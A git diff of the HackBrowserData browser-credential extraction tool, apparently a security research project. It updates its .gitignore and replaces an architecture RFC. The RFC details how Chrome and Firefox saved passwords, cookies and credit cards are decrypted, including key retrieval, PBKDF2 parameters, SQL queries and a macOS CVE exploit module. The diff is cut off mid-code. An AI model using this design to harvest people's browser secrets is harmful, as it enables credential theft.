diff --git a/.gitignore b/.gitignore index 0c4f246..7d73b9d 100644 --- a/.gitignore +++ b/.gitignore @@ -1,210 +1,49 @@ -# General -.DS_Store -.AppleDouble -.LSOverride +# Ignore everything by default (whitelist approach). +# This is critical for a security research tool — prevents +# accidental commit of browser data files (Cookies, Login Data, etc.) +* -# Icon must end with two \r -Icon +# Allow git to traverse directories +!*/ -# Thumbnails -._* +# === Source code === +!*.go +!go.mod +!go.sum -# Files that might appear in the root of a volume -.DocumentRevisions-V100 -.fseventsd -.Spotlight-V100 -.TemporaryItems -.Trashes -.VolumeIcon.icns -.com.apple.timemachine.donotpresent +# === Project root config === +!.gitignore +!.golangci.yml +!.goreleaser.yml +!.typos.toml +!CLAUDE.md +!LICENSE -# Directories potentially created on remote AFP share -.AppleDB -.AppleDesktop -Network Trash Folder -Temporary Items -.apdisk +# === Documentation === +!README.md +!CONTRIBUTING.md +!CODE_OF_CONDUCT.md +!LOGO.png +!CONTRIBUTORS.svg +# === GitHub === +!.github/workflows/*.yml +!.github/ISSUE_TEMPLATE/*.md +!.github/PULL_REQUEST_TEMPLATE.md +!.github/dependabot.yml +!.github/release-drafter.yml -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class +# === RFCs === +!rfcs/*.md -# C extensions -*.so +# === Test fixtures === +!utils/chainbreaker/testdata/*.keychain-db -# Distribution / packaging -.Python -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib64/ -parts/ -sdist/ -var/ -wheels/ -pip-wheel-metadata/ -share/python-wheels/ -*.egg-info/ -.installed.cfg -*.egg -MANIFEST - -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. -*.manifest -*.spec - -# Installer logs -pip-log.txt -pip-delete-this-directory.txt - -# Unit test / coverage reports -htmlcov/ -.tox/ -.nox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*.cover -*.py,cover -.hypothesis/ -.pytest_cache/ - -# Translations -*.mo -*.pot - -# Django stuff: -*.log -local_settings.py -db.sqlite3 -db.sqlite3-journal - -# Flask stuff: -instance/ -.webassets-cache - -# Scrapy stuff: -.scrapy - -# Sphinx documentation -docs/_build/ - -# PyBuilder -target/ - -# Jupyter Notebook -.ipynb_checkpoints - -# IPython -profile_default/ -ipython_config.py - -# pyenv -.python-version - -# pipenv -# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. -# However, in case of collaboration, if having platform-specific dependencies or dependencies -# having no cross-platform support, pipenv may install dependencies that don't work, or not -# install all needed dependencies. -#Pipfile.lock - -# PEP 582; used by e.g. github.com/David-OConnor/pyflow -__pypackages__/ - -# Celery stuff -celerybeat-schedule -celerybeat.pid - -# SageMath parsed files -*.sage.py - -# Environments -.env -.venv -env/ -venv/ -ENV/ -env.bak/ -venv.bak/ - -# Spyder project settings -.spyderproject -.spyproject - -# Rope project settings -.ropeproject - -# mkdocs documentation -/site - -# mypy -.mypy_cache/ -.dmypy.json -dmypy.json - -# Pyre type checker -.pyre/ - -# idea +# === Always ignore (override !*/) === +.git/ .idea/ -.idea - -# windows -*.exe -# macOS - -# binary -cmd/agent -cmd/server -# bin -# file -*.csv -*.xlsx -*.txt - -# config file -config.toml -*.json -Bookmarks -Login Data -Cookies -History -*.db -*.sqlite -*.sqlite-shm -*.sqlite-wal - -#Chromium* -#Firefox* +.vscode/ +vendor/ result/ results/ - -hack-browser-data -!/cmd/hack-browser-data -!/browserdata/history -!/browserdata/history/history.go -!/browserdata/history/history_test.go - -# github action -!/.github/workflows/unittest.yml -!/.github/ISSUE_TEMPLATE/*.md -!/.github/*.md - -# Community -!CONTRIBUTING.md - -# CICD Config -!.typos.toml -!.github/*.yml -!log/ -examples/*.go \ No newline at end of file +.DS_Store diff --git a/rfc/001-architecture-refactoring.md b/rfc/001-architecture-refactoring.md deleted file mode 100644 index 36b4fa2..0000000 --- a/rfc/001-architecture-refactoring.md +++ /dev/null @@ -1,241 +0,0 @@ -# RFC-001: HackBrowserData Architecture Refactoring - -**Author**: moonD4rk -**Status**: Proposed -**Created**: 2025-09-01 -**Updated**: 2025-09-01 - -## Abstract - -This RFC analyzes the current architectural issues in the HackBrowserData project and proposes refactoring directions. The core goal of the refactoring is to establish a modular, extensible, and testable architecture while supporting usage as a library that can be imported by other projects. - -## Current Issues Analysis - -### 1. Limited Encryption Version Support - -**Current State**: -- Only supports Chrome v10 (Chrome 80+) AES-GCM encryption format -- Hardcoded "v10" prefix handling logic in the code -- Lacks version detection and dynamic selection mechanism - -**Impact**: -- Unable to support data extraction from older browser versions -- Cannot adapt to future browser encryption algorithm upgrades (e.g., v11, v20) -- Chrome is introducing new encryption mechanisms (e.g., App-Bound Encryption in Chrome 127+), which the current architecture struggles to extend - -### 2. Scattered Cross-Platform MasterKey Retrieval - -**Current State**: -- Windows: Decrypts encrypted_key from Local State via DPAPI -- macOS: Accesses Keychain through security command, derives key using PBKDF2 -- Linux: Accesses Secret Service via D-Bus or uses hardcoded "peanuts" salt - -**Issues**: -- Each platform implementation is completely independent without a unified interface -- Difficult to add new key retrieval methods -- Code duplication and maintenance challenges -- Chrome on Windows is updating retrieval methods, requiring support for multiple strategies - -### 3. Windows Cookie File Access Permission Issues - -**Specific Issues**: -- On Windows, browsers lock Cookie files during runtime -- Direct reading may encounter "The process cannot access the file" errors -- Some security software blocks access to Cookie files - -**Current Approach Limitations**: -- Simple file copying may fail due to file locking -- Lacks alternative access strategies (e.g., shadow copy, process injection) -- No abstraction for permission elevation or bypass mechanisms - -### 4. Coupled Code Architecture - -**Problems**: -- CLI logic mixed with core functionality -- Data extraction, decryption, and output are tightly coupled -- Uses global variables and functions, difficult to use as a library - -**Specific Impact**: -- Cannot use core functionality independently -- Difficult to unit test -- Code reuse challenges - -### 5. Inconsistent Error Handling - -**Current State**: -- Some functions return errors, others directly use logging -- Error messages lack context (which browser, data type, platform) -- Cannot distinguish error severity (ignorable vs. fatal errors) - -**Impact**: -- Debugging difficulties with insufficient error information -- Cannot implement flexible error handling strategies -- Inconsistent user experience - -### 6. Testing and Maintenance Difficulties - -**Issues**: -- Depends on real file system and browser installations -- Cannot mock system calls and external dependencies -- Low test coverage -- Adding new features requires modifying multiple code locations - -## Architecture Improvement Proposals - -### 1. Versioned Encryption Strategies - -**Design Approach**: -- Create encryption version interface where each version implements its own detection and decryption logic -- Use registration mechanism to manage all supported versions -- Support both automatic detection and manual version specification - -**Key Capabilities**: -- Version Detection: Automatically identify encryption version through data characteristics -- Version Registration: Dynamically register new encryption version implementations -- Priority Control: Try different versions by priority - -### 2. Unified MasterKey Retrieval Abstraction - -**Design Approach**: -- Define cross-platform MasterKey retrieval interface -- Each platform can have multiple retrieval strategies -- Support strategy chain, trying different methods sequentially - -**Windows Strategy Examples**: -- DPAPI Strategy (traditional method) -- App-Bound Strategy (Chrome 127+) -- Cloud Sync Strategy (potential future) - -**Key Capabilities**: -- Platform detection and automatic selection -- Strategy priority and fallback mechanisms -- Error handling and logging - -### 3. File Access Abstraction Layer - -**Design Approach**: -- Create file access interface encapsulating different access strategies -- For Windows Cookie issues, implement multiple access methods -- Provide unified error handling and retry mechanisms - -**Windows Cookie Access Strategies**: -- Direct Copy (current method) -- Volume Shadow Copy Service (VSS) -- Memory Reading (from browser process) -- Stream Reading (bypass exclusive locks) - -### 4. Layered Package Structure - -**Design Principles**: -- Separate public API from internal implementation -- Separate interface definitions from concrete implementations -- Isolate platform-specific code - -**Package Structure Plan**: -``` -pkg/ # Public API (externally importable) -├── browser/ # Browser interface definitions -├── crypto/ # Encryption interface definitions -└── extractor/ # Data extractor interface definitions - -internal/ # Internal implementation (not exposed) -├── browser/ # Browser implementations -├── crypto/ # Encryption algorithm implementations -└── platform/ # Platform-specific implementations -``` - -### 5. Improved Browser Interface - -**Design Goals**: -- Support dependency injection -- Configurable and extensible -- Easy to test - -**Core Methods**: -- Configuration settings (profile, crypto provider, etc.) -- Data extraction (support selecting data types) -- Capability queries (supported data types and platforms) - -### 6. Unified Error Handling - -**Design Approach**: -- Define structured error types -- Include rich context information -- Support error classification and handling strategies - -**Error Information Should Include**: -- Operation type -- Browser name -- Data type -- Platform information -- Severity level -- Original error - -### 7. Library API Design - -**Design Goals**: -- Provide clean client interface -- Support convenient methods for common use cases -- Allow advanced users to customize behavior - -**Use Cases**: -- Simple: One-click extraction of all browser data -- Advanced: Custom encryption versions, error handling, data filtering - -### 8. Testing Strategy - -**Improvement Directions**: -- Use interfaces instead of concrete implementations -- Support dependency injection -- Provide mock implementations - -**Test Types**: -- Unit tests: Test independent components -- Integration tests: Test component interactions -- Platform tests: Test platform-specific functionality - -## Implementation Recommendations - -### Priority Levels - -1. **High Priority**: - - Versioned encryption strategies (solve version support issues) - - MasterKey retrieval abstraction (unify cross-platform implementations) - - Windows Cookie access issues (solve permission problems) - -2. **Medium Priority**: - - Browser interface refactoring - - Unified error handling - - Basic testing framework - -3. **Low Priority**: - - Complete library API - - Advanced feature extensions - - Performance optimizations - -### Compatibility Considerations - -- Keep CLI backward compatible, internally calling new architecture -- Provide migration documentation -- Gradually deprecate old APIs across versions - -## Security Considerations - -1. **Minimize Permissions**: Only request necessary system permissions -2. **Memory Safety**: Zero out sensitive data after use -3. **Error Messages**: Avoid leaking sensitive information -4. **Input Validation**: Strictly validate paths and data - -## Open Questions - -1. **File Access Strategy Selection**: How to automatically select the best file access strategy? -2. **Error Recovery**: How to gracefully recover and continue when encountering partial failures? -3. **Configuration Management**: Should configuration files be supported to control behavior? -4. **Plugin System**: Should user-defined data extractors be supported? - -## References - -- [Chromium OS Crypt](https://source.chromium.org/chromium/chromium/src/+/main:components/os_crypt/) -- [Chrome Password Decryption](https://github.com/chromium/chromium/blob/main/components/os_crypt/sync/os_crypt_win.cc) -- [Firefox NSS](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS) -- [Windows File Locking](https://docs.microsoft.com/en-us/windows/win32/fileio/locking-and-unlocking-byte-ranges-in-files) \ No newline at end of file diff --git a/rfcs/001-architecture-refactoring.md b/rfcs/001-architecture-refactoring.md new file mode 100644 index 0000000..4b0711c --- /dev/null +++ b/rfcs/001-architecture-refactoring.md @@ -0,0 +1,798 @@ +# RFC-001: Architecture Refactoring + +**Author**: moonD4rk +**Status**: Proposed +**Created**: 2025-09-01 +**Updated**: 2026-03-22 + +## Abstract + +This RFC addresses the overall architecture of HackBrowserData: + +1. **Data model redesign**: `Category` enum + browser-agnostic `*Entry` structs +2. **Crypto layer**: cipher version detection, master key retrieval abstraction +3. **Browser registration & discovery**: declarative config, direct profile scanning +4. **Yandex variant handling**: source overrides + query overrides +5. **Error handling**: collect-and-continue pattern + +**Constraint**: Go 1.20 (Windows 7 support). + +See RFC-002 for file acquisition, extract method details, and output. + +--- + +## 1. Target Directory Structure + +``` +hackbrowserdata/ +├── cmd/ +│ └── hack-browser-data/ +│ └── main.go # CLI: flag parsing → PickBrowsers → Extract → Output +│ +├── browser/ +│ ├── browser.go # Browser interface, BrowserKind, Config, PickBrowsers() +│ ├── browser_darwin.go # platformBrowsers() → []Config +│ ├── browser_windows.go # platformBrowsers() → []Config +│ ├── browser_linux.go # platformBrowsers() → []Config +│ │ +│ ├── chromium/ +│ │ ├── chromium.go # Chromium struct (holds masterKey []byte), Extract() +│ │ ├── chromium_darwin.go # platform key retriever wiring +│ │ ├── chromium_windows.go # platform key retriever wiring +│ │ ├── chromium_linux.go # platform key retriever wiring +│ │ ├── source.go # chromiumSources, yandexSources maps +│ │ ├── extract_password.go # extractPasswords() + default SQL query +│ │ ├── extract_cookie.go # extractCookies() + default SQL query +│ │ ├── extract_history.go # extractHistories() + default SQL query +│ │ ├── extract_download.go # extractDownloads() + default SQL query +│ │ ├── extract_bookmark.go # extractBookmarks() (JSON) +│ │ ├── extract_creditcard.go # extractCreditCards() + default SQL query +│ │ ├── extract_extension.go # extractExtensions() (JSON) +│ │ └── extract_storage.go # extractLocalStorage(), extractSessionStorage() (LevelDB) +│ │ +│ ├── firefox/ +│ │ ├── firefox.go # Firefox struct, Extract(), deriveMasterKey() +│ │ ├── firefox_test.go +│ │ ├── source.go # firefoxSources map +│ │ ├── extract_password.go # extractPasswords() (JSON + ASN1PBE) +│ │ ├── extract_cookie.go # extractCookies() (SQLite, no encryption) +│ │ ├── extract_history.go # extractHistories() (SQLite) +│ │ ├── extract_download.go # extractDownloads() (SQLite) +│ │ ├── extract_bookmark.go # extractBookmarks() (SQLite) +│ │ ├── extract_extension.go # extractExtensions() (JSON) +│ │ └── extract_storage.go # extractLocalStorage() (SQLite) +│ │ +│ └── exploit/ +│ └── gcoredump/ +│ └── gcoredump.go # CVE-2025-24204 macOS exploit (darwin only) +│ +├── browserdata/ +│ ├── browserdata.go # BrowserData struct (typed slices) +│ ├── output.go # BrowserData.Output() — CSV/JSON writer +│ ├── output_test.go +│ │ +│ └── datautil/ +│ ├── sqlite.go # QuerySQLite() helper +│ ├── query.go # queryRows[T]() generic helper (Go 1.20) +│ └── decrypt.go # DecryptChromiumValue() helper +│ +├── crypto/ +│ ├── crypto.go # AESCBCDecrypt, AESGCMDecrypt, DES3, PKCS5 +│ ├── crypto_darwin.go # DecryptWithChromium (CBC), DecryptWithDPAPI (returns error) +│ ├── crypto_windows.go # DecryptWithChromium (GCM), DecryptWithDPAPI +│ ├── crypto_linux.go # DecryptWithChromium (CBC), DecryptWithDPAPI (returns error) +│ ├── crypto_test.go +│ ├── version.go # DetectVersion(), StripPrefix(), CipherVersion +│ ├── asn1pbe.go # Firefox ASN.1 PBE key derivation +│ ├── asn1pbe_test.go +│ ├── pbkdf2.go +│ │ +│ └── keyretriever/ +│ ├── keyretriever.go # KeyRetriever interface, ChainRetriever +│ ├── keyretriever_darwin.go # GcoredumpRetriever, SecurityCmdRetriever +│ ├── keyretriever_windows.go # DPAPIRetriever +│ ├── keyretriever_linux.go # DBusRetriever, FallbackRetriever +│ └── params.go # PBKDF2Params (saltysalt, iterations) +│ +├── filemanager/ +│ └── session.go # Session: MkdirTemp, TempDir(), Acquire(), Cleanup() +│ +├── types/ +│ ├── category.go # Category enum (9 values) +│ ├── models.go # LoginEntry, CookieEntry, ... (browser-agnostic) +│ └── types_test.go +│ +├── log/ +│ ├── log.go +│ ├── logger.go +│ ├── logger_test.go +│ └── level.go # log levels (merged from level/ sub-package) +│ +└── utils/ + ├── byteutil/ + │ └── byteutil.go + ├── fileutil/ + │ ├── fileutil.go # renamed from filetutil.go + │ └── fileutil_test.go + ├── typeutil/ + │ ├── typeutil.go + │ └── typeutil_test.go + └── chainbreaker/ + ├── chainbreaker.go + └── chainbreaker_test.go +``` + +### What changed vs current structure + +| Change | Current | Target | +|--------|---------|--------| +| **New** `browserdata/datautil/` | — | SQLite + decrypt helpers | +| **New** `filemanager/` | — | Session-based temp file management | +| **New** `crypto/keyretriever/` | — | Master key retrieval abstraction | +| **New** `crypto/version.go` | — | Cipher version detection | +| **New** `browser/chromium/extract_*.go` | — | Per-category extract methods | +| **New** `browser/firefox/extract_*.go` | — | Per-category extract methods | +| **New** `browser/*/source.go` | — | File source mapping per engine | +| **Restructured** `types/` | 22 DataType constants + file mappings | 9 Category constants + data model structs | +| **Deleted** `extractor/` | interface + registry + factory | not needed | +| **Deleted** `browserdata/imports.go` | init() side-effect registration | not needed | +| **Deleted** `browserdata/password/`, `cookie/`, etc. | 9 sub-packages | extract logic moved into browser engines | +| **Deleted** `browser/consts.go` | 27 scattered constants | inlined into Config | +| **Renamed** `filetutil.go` | typo | `fileutil.go` | +| **Renamed** `AES128CBCDecrypt` | misleading name | `AESCBCDecrypt` | + +### Naming conventions + +| Concept | Package | Type/Func | File | +|---------|---------|-----------|------| +| Data category | `types` | `Category` (int enum) | `category.go` | +| Data models | `types` | `LoginEntry`, `CookieEntry`, ... | `models.go` | +| Result container | `browserdata` | `BrowserData` | `browserdata.go` | +| Browser config | `browser` | `Config` | `browser.go` | +| Browser engine kind | `browser` | `BrowserKind` | `browser.go` | +| File source mapping | `chromium`/`firefox` | `source` struct, `chromiumSources` map | `source.go` | +| Key retrieval | `keyretriever` | `KeyRetriever` (interface) | `keyretriever.go` | +| Strategy chain | `keyretriever` | `ChainRetriever` | `keyretriever.go` | +| Cipher version | `crypto` | `CipherVersion` | `version.go` | +| Temp file session | `filemanager` | `Session` | `session.go` | +| SQLite helper | `datautil` | `QuerySQLite` (func) | `sqlite.go` | +| Generic query helper | `datautil` | `queryRows[T]` (func) | `query.go` | +| Decrypt helper | `datautil` | `DecryptChromiumValue` (func) | `decrypt.go` | + +### Public vs private + +| Symbol | Exported | Reason | +|--------|----------|--------| +| `Browser` interface | Yes | used by cmd/main.go | +| `Config` struct | Yes | passed to chromium.New() | +| `PickBrowsers()` | Yes | called by cmd/main.go | +| `platformBrowsers()` | No | browser package internal | +| `isValidBrowserDir()` | No | browser package internal | +| `Chromium.Extract()` | Yes | implements Browser interface | +| `Chromium.extractPasswords()` | No | chromium package internal | +| `Chromium.acquireFiles()` | No | chromium package internal | +| `discoverProfiles()` | No | chromium package internal | +| `BrowserData` struct | Yes | returned to cmd/main.go | +| `BrowserData.Output()` | Yes | called by cmd/main.go | +| `QuerySQLite()` | Yes | used by chromium and firefox | +| `QueryRows[T]()` | Yes | used by chromium and firefox | + +### File naming convention for `extract_*.go` + +Files inside `browser/chromium/` and `browser/firefox/` use the `extract_` prefix for extraction logic. This groups them visually when sorted alphabetically: + +``` +chromium.go ← struct + Extract orchestration +chromium_darwin.go ← platform: master key +chromium_linux.go +chromium_windows.go +extract_bookmark.go ← extract: one file per Category +extract_cookie.go +extract_creditcard.go +extract_download.go +extract_extension.go +extract_history.go +extract_password.go +extract_storage.go +source.go ← file source mapping +``` + +Three natural groups: `chromium*` (struct + platform), `extract_*` (data extraction), `source.go` (file mapping). Each `extract_*.go` file contains the default SQL query constant and the extract method (~20-30 lines). + +--- + +## 2. Core Data Model Redesign + +### 2.1 Problem: MasterKey mixed with data types + +The current `DataType` enum contains 22 constants that conflate three concerns: + +- **Infrastructure** (keys): `ChromiumKey`, `FirefoxKey4` +- **Browser engine prefix**: `ChromiumPassword` vs `FirefoxPassword` vs `YandexPassword` +- **File layout**: `Filename()`, `TempFilename()` methods on the enum + +A password is a password regardless of which browser it came from. The browser engine determines *how* to extract, not *what* the data is. + +### 2.2 New design: Category + Models + +**`types/category.go`** — 9 data categories (down from 22 DataType constants): + +```go +package types + +type Category int + +const ( + Password Category = iota + Cookie + Bookmark + History + Download + CreditCard + Extension + LocalStorage + SessionStorage +) + +var AllCategories = []Category{ + Password, Cookie, Bookmark, History, Download, + CreditCard, Extension, LocalStorage, SessionStorage, +} + +func (c Category) String() string { ... } + +func (c Category) IsSensitive() bool { + switch c { + case Password, Cookie, CreditCard: + return true + default: + return false + } +} + +func NonSensitiveCategories() []Category { + var cats []Category + for _, c := range AllCategories { + if !c.IsSensitive() { + cats = append(cats, c) + } + } + return cats +} +``` + +**`types/models.go`** — browser-agnostic data models, no encrypted fields: + +```go +package types + +import "time" + +type LoginEntry struct { + URL string `json:"url" csv:"url"` + Username string `json:"username" csv:"username"` + Password string `json:"password" csv:"password"` + CreatedAt time.Time `json:"created_at" csv:"created_at"` +} + +type CookieEntry struct { + Host string `json:"host" csv:"host"` + Path string `json:"path" csv:"path"` + Name string `json:"name" csv:"name"` + Value string `json:"value" csv:"value"` + IsSecure bool `json:"is_secure" csv:"is_secure"` + IsHTTPOnly bool `json:"is_httponly" csv:"is_httponly"` + ExpireAt time.Time `json:"expire_at" csv:"expire_at"` + CreatedAt time.Time `json:"created_at" csv:"created_at"` +} + +type BookmarkEntry struct { + Name string `json:"name" csv:"name"` + URL string `json:"url" csv:"url"` + Folder string `json:"folder" csv:"folder"` + CreatedAt time.Time `json:"created_at" csv:"created_at"` +} + +type HistoryEntry struct { + URL string `json:"url" csv:"url"` + Title string `json:"title" csv:"title"` + VisitCount int `json:"visit_count" csv:"visit_count"` + LastVisit time.Time `json:"last_visit" csv:"last_visit"` +} + +type DownloadEntry struct { + URL string `json:"url" csv:"url"` + TargetPath string `json:"target_path" csv:"target_path"` + TotalBytes int64 `json:"total_bytes" csv:"total_bytes"` + StartTime time.Time `json:"start_time" csv:"start_time"` + EndTime time.Time `json:"end_time" csv:"end_time"` +} + +type CreditCardEntry struct { + Name string `json:"name" csv:"name"` + Number string `json:"number" csv:"number"` + ExpMonth string `json:"exp_month" csv:"exp_month"` + ExpYear string `json:"exp_year" csv:"exp_year"` +} + +type StorageEntry struct { + URL string `json:"url" csv:"url"` + Key string `json:"key" csv:"key"` + Value string `json:"value" csv:"value"` +} + +type ExtensionEntry struct { + Name string `json:"name" csv:"name"` + ID string `json:"id" csv:"id"` + Description string `json:"description" csv:"description"` + Version string `json:"version" csv:"version"` +} +``` + +### 2.3 Result container + +**`browserdata/browserdata.go`**: + +```go +type BrowserData struct { + Passwords []types.LoginEntry + Cookies []types.CookieEntry + Bookmarks []types.BookmarkEntry + Histories []types.HistoryEntry + Downloads []types.DownloadEntry + CreditCards []types.CreditCardEntry + Extensions []types.ExtensionEntry + LocalStorage []types.StorageEntry + SessionStorage []types.StorageEntry +} +``` + +### 2.4 What was removed from types/ + +| Removed | Reason | +|---------|--------| +| `ChromiumKey`, `FirefoxKey4` | MasterKey is infrastructure, handled inside browser engine | +| `Chromium*`/`Firefox*`/`Yandex*` prefixes | Browser engine is extraction concern, not type concern | +| `Filename()`, `TempFilename()` | File layout is browser engine's internal knowledge | +| `itemFileNames` map | Moved into `chromium/source.go` and `firefox/source.go` | +| `DefaultChromiumTypes`, `DefaultFirefoxTypes`, `DefaultYandexTypes` | Replaced by `types.AllCategories` | +| `extractor/` package | No longer needed — browser engines have typed extract methods | +| `browserdata/imports.go` | No longer needed — no init() registration | + +--- + +## 3. Crypto Layer + +### 3.1 Cipher version detection + +**New file**: `crypto/version.go` + +```go +type CipherVersion string + +const ( + CipherV10 CipherVersion = "v10" // Chrome 80+ + CipherV20 CipherVersion = "v20" // Chrome 127+ App-Bound Encryption + CipherDPAPI CipherVersion = "dpapi" // pre-Chrome 80 +) + +func DetectVersion(ciphertext []byte) CipherVersion { + if len(ciphertext) < 3 { return CipherDPAPI } + prefix := string(ciphertext[:3]) + switch prefix { + case "v10": + return CipherV10 + case "v20": + return CipherV20 + default: + return CipherDPAPI + } +} + +func StripPrefix(ciphertext []byte) []byte { + ver := DetectVersion(ciphertext) + if ver == CipherV10 || ver == CipherV20 { + return ciphertext[3:] + } + return ciphertext +} +``` + +Version-specific post-processing (e.g., v20 cookie value has a 32-byte header) belongs here, not in extract methods: + +```go +// DecryptCookieValue handles version-specific cookie decryption. +func DecryptCookieValue(key, ciphertext []byte) ([]byte, error) { + version := DetectVersion(ciphertext) + payload := StripPrefix(ciphertext) + + switch version { + case CipherV10: + return decryptPayload(key, payload) + case CipherV20: + value, err := decryptPayload(key, payload) + if err != nil { return nil, err } + if len(value) > 32 { + return value[32:], nil // strip App-Bound header + } + return value, nil + default: + return nil, fmt.Errorf("unsupported cipher version: %s", version) + } +} +``` + +### 3.2 Key retriever abstraction + +**New package**: `crypto/keyretriever/` + +```go +type KeyRetriever interface { + RetrieveKey(storage string, localStatePath string) ([]byte, error) +} + +// Note: Windows DPAPIRetriever reads localStatePath to extract the encrypted key. +// macOS and Linux retrievers ignore localStatePath (they use keychain/dbus instead). + +type ChainRetriever struct { + retrievers []KeyRetriever +} + +func NewChain(retrievers ...KeyRetriever) KeyRetriever { ... } + +func (c *ChainRetriever) RetrieveKey(storage string, localStatePath string) ([]byte, error) { + var lastErr error + for _, r := range c.retrievers { + key, err := r.RetrieveKey(storage, localStatePath) + if err == nil && len(key) > 0 { return key, nil } + lastErr = err + } + return nil, fmt.Errorf("all key retrievers failed: %w", lastErr) +} +``` + +Platform defaults: +- macOS: `NewChain(&GcoredumpRetriever{}, &SecurityCmdRetriever{})` +- Windows: `&DPAPIRetriever{}` +- Linux: `NewChain(&DBusRetriever{}, &FallbackRetriever{})` + +**`params.go`** centralizes PBKDF2 magic values with source links: + +```go +var ( + // https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm + macOSParams = PBKDF2Params{Salt: []byte("saltysalt"), Iterations: 1003, KeyLen: 16} + // https://source.chromium.org/chromium/chromium/src/+/main:components/os_crypt/os_crypt_linux.cc + linuxParams = PBKDF2Params{Salt: []byte("saltysalt"), Iterations: 1, KeyLen: 16} +) +``` + +--- + +## 4. Browser Registration & Discovery + +### 4.1 Declarative browser config + +```go +// browser/browser.go +type BrowserKind int +const ( + KindChromium BrowserKind = iota + KindChromiumYandex // Chromium variant with different file names and SQL queries + KindFirefox +) + +type Config struct { + Key string // lookup key: "chrome", "firefox" + Name string // display name: "Chrome", "Firefox" + Kind BrowserKind + Storage string // keychain label (macOS/Linux); unused on Windows (DPAPI reads Local State directly) + UserDataDir string // e.g. ~/Library/Application Support/Google/Chrome/ +} + +type Browser interface { + Name() string + Extract(categories []types.Category) (*browserdata.BrowserData, error) +} +``` + +### 4.2 Platform browser list & PickBrowsers + +Each platform file defines `platformBrowsers()`. Use full paths per line (no shared prefix variable): + +```go +// browser/browser_darwin.go +func platformBrowsers() []Config { + return []Config{ + {Key: "chrome", Name: "Chrome", Kind: KindChromium, Storage: "Chrome", + UserDataDir: homeDir + "/Library/Application Support/Google/Chrome"}, + {Key: "edge", Name: "Edge", Kind: KindChromium, Storage: "Microsoft Edge", + UserDataDir: homeDir + "/Library/Application Support/Microsoft Edge"}, + // ... other browsers + } +} +``` + +```go +func PickBrowsers(name, profile string) ([]Browser, error) { + name = strings.ToLower(name) + var browsers []Browser + configs := platformBrowsers() + for _, cfg := range configs { + if name != "all" && cfg.Key != name { continue } + dir := cfg.UserDataDir + if profile != "" { dir = profile } + if !isValidBrowserDir(cfg.Kind, dir) { + continue + } + bs, err := newBrowserFromConfig(cfg, dir) + if err != nil { + log.Debugf("skip %s: %v", cfg.Name, err) + continue + } + browsers = append(browsers, bs...) + } + return browsers, nil +} + +func newBrowserFromConfig(cfg Config, dir string) ([]Browser, error) { + switch cfg.Kind { + case KindChromium, KindChromiumYandex: + return chromium.New(cfg, dir) + case KindFirefox: + return firefox.New(dir) + default: + return nil, fmt.Errorf("unknown browser kind: %d", cfg.Kind) + } +} +``` + +### 4.3 Browser installation validation & profile discovery + +Before enumerating profiles, confirm the directory is a real browser installation. For Chromium, the `Local State` file is the confirmation signal: + +```go +func isValidBrowserDir(kind BrowserKind, dir string) bool { + if !fileutil.IsDirExists(dir) { return false } + switch kind { + case KindChromium, KindChromiumYandex: + return fileutil.IsFileExists(filepath.Join(dir, "Local State")) + case KindFirefox: + return true + } + return false +} +``` + +Chromium profiles are deterministic (`Default/`, `Profile 1/`, ...). Directly `os.ReadDir()` and check known file paths instead of `filepath.Walk`. + +Firefox profiles are `xxxxxxxx.name/` directories. Enumerate and check for `key4.db` or `logins.json`. + +--- + +## 5. Yandex Variant Handling + +Yandex is Chromium-based with 3 differences: + +| Aspect | Standard Chromium | Yandex | +|--------|------------------|--------| +| Password file | `Login Data` | `Ya Passman Data` | +| Password SQL | `SELECT origin_url, ...` | `SELECT action_url, ...` | +| CreditCard file | `Web Data` | `Ya Credit Cards` | + +### 5.1 Separate source map + +```go +// browser/chromium/source.go + +var yandexSources = map[types.Category]source{ + types.Password: {paths: []string{"Ya Passman Data"}}, // different + types.Cookie: {paths: []string{"Network/Cookies", "Cookies"}}, + types.History: {paths: []string{"History"}}, + types.Download: {paths: []string{"History"}}, + types.Bookmark: {paths: []string{"Bookmarks"}}, + types.CreditCard: {paths: []string{"Ya Credit Cards"}}, // different + types.Extension: {paths: []string{"Secure Preferences"}}, + types.LocalStorage: {paths: []string{"Local Storage/leveldb"}, isDir: true}, + types.SessionStorage: {paths: []string{"Session Storage"}, isDir: true}, +} +``` + +### 5.2 Query overrides (default + override pattern) + +Each extract method defines its own default SQL query constant. The Chromium struct holds an optional override map: + +```go +// browser/chromium/chromium.go +type Chromium struct { + name string + profileDir string + masterKey []byte // retrieved once in New(), shared across profiles + sources map[types.Category]source // chromiumSources or yandexSources + queryOverrides map[types.Category]string // nil for standard Chromium +} + +var yandexQueryOverrides = map[types.Category]string{ + types.Password: `SELECT action_url, username_value, password_value, date_created FROM logins`, +} +``` + +Extract methods check for overrides locally: + +```go +// browser/chromium/extract_password.go +const defaultLoginQuery = `SELECT origin_url, username_value, password_value, date_created FROM logins` + +func (c *Chromium) extractPasswords(masterKey []byte, path string) ([]types.LoginEntry, error) { + query := defaultLoginQuery + if q, ok := c.queryOverrides[types.Password]; ok { + query = q + } + // ... rest of extraction +} +``` + +### 5.3 Wiring at creation time + +```go +func New(cfg browser.Config, userDataDir string) ([]*Chromium, error) { + sources := chromiumSources + var overrides map[types.Category]string + if cfg.Kind == browser.KindChromiumYandex { + sources = yandexSources + overrides = yandexQueryOverrides + } + + // Retrieve master key ONCE for the entire browser, shared across all profiles. + localStatePath := filepath.Join(userDataDir, "Local State") + retriever := platformKeyRetriever() // returns ChainRetriever per platform + masterKey, err := retriever.RetrieveKey(cfg.Storage, localStatePath) + if err != nil { return nil, fmt.Errorf("retrieve master key: %w", err) } + + // ... discover profiles, create Chromium instances with masterKey + sources + overrides +} +``` + +Zero if-branches in any extract method. All variant differences concentrated in `source.go` and `New()`. The master key is retrieved once and injected into every `Chromium` instance (one per profile). + +--- + +## 6. Error Handling + +### 6.1 Collect-and-continue pattern + +`Extract()` collects errors per category but continues extracting. The returned `data` and `err` can both be non-nil: + +```go +func (c *Chromium) Extract(categories []types.Category) (*browserdata.BrowserData, error) { + session, err := filemanager.NewSession() + if err != nil { return nil, err } + defer session.Cleanup() + + files := c.acquireFiles(session, 